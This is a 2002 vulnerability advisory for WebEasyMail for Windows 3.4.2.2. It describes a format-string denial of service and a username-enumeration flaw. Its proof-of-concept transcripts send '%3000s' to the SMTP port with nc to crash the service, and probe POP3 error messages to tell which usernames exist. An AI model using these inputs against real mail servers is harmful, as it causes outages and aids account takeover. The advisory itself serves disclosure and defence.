Reported August 20, 2002, by Stan
Bubrouski.
VERSION AFFECTED
·
WebEasyMail for Windows 3.4.2.2 and earlier versions
DESCRIPTION
Two
vulnerabilities exist in WebEasyMail for Windows 3.4.2.2 and earlier versions
that can result in a Denial of Service (DoS) condition and information
disclosure. The DoS condition results when an attacker sends specially crafted
format strings as input, such as the “printf” family of functions, resulting
in the service terminating without an error message. The information disclosure
vulnerability lets an attacker obtain a valid username and password on the
vulnerable system. By default, an attacker can make unlimited logon attempts
without the server terminating the connection. If the attacker gives a wrong
password, the server responds with "-ERR invalid username" if
the user doesn't exist and responds with "-ERR wrong password for this
user" if the user exists.
DEMONSTRATION
The discoverer posted the following scenarios as
proof-of-concept:
For the DoS condition:
$
nc localhost 25
220
ESMTP on WebEasyMail \[3.4.2.2\] ready. http://www.winwebmail.com
%2
502
Error: command not implemented
%2s
502
Error: command not implemented
%100s
502
Error: command not implemented
%3000s
\[emsrv.exe
silently dies here\]
$
For
the information disclosure vulnerability:
OK
POP3 on WebEasyMail \[3.4.2.2\] ready. http://www.winwebmail.com
user
dog
+OK
user accepted
pass
dog
-ERR
invalid username
user
test
+OK
user accepted
pass
dog
-ERR
wrong password for this user
VENDOR RESPONSE
The
vendor, WebEasyMail, has been
notified, but has not yet released a patch for this vulnerability.
CREDIT
Discovered by Stan
Bubrouski.
Multiple Vulnerabilities in WebEasyMail for Windows
0 comments
Hide comments